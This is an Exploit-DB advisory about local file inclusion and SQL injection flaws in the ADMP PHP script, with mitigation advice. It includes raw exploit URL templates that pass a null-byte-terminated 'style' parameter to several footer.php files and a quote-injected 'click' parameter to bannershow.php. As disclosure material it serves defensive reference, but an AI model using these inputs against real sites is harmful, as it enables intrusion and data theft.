Local File Include / SQL Injection

vendor:

ADMP

by:

ItSecTeam

7,5

CVSS

HIGH

Local File Include / SQL Injection

22, 89

CWE

Product Name: ADMP

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Local File Include / SQL Injection

The vulnerability exists in the ADMP script, which allows an attacker to perform a Local File Include (LFI) attack by manipulating the 'style' parameter in the footer.php file. Additionally, an attacker can also perform a SQL injection attack by manipulating the 'click' parameter in the bannershow.php file.

Mitigation:

Input validation should be performed on all user-supplied data to prevent malicious input from being passed to the application. Additionally, the application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#########################local file include / sql injection#################
Author: ItSecTeam

download from:http://geekhelps.net/download.php

script:ADMP

remote:yes

dork::D
*********************lfi*******************
vul1:/path/themes/colorvoid/footer.php
include("./themes/$style/info.php"); ?> line 3

vuls:themes/default-green/footer.php
themes/default-orange/footer.php
themes/default/footer.php

include("./themes/$style/info.php"); ?> line 4
--------------------------------------------

xpl lfi:/path/themes/colorvoid/footer.php?style=[lfi]%00
xpl lfi:/path/themes/default-green/footer.php ?style=[lfi]%00

xpl lfi:/path/themes/default-orange/footer.php?style=[lfi]%00
xpl lfi:/path/themes/default/footer.php?style=[lfi]%00

xpl sql:/path/bannershow.php?click=' sql injection code

########################

discovered by ahmadbady

########################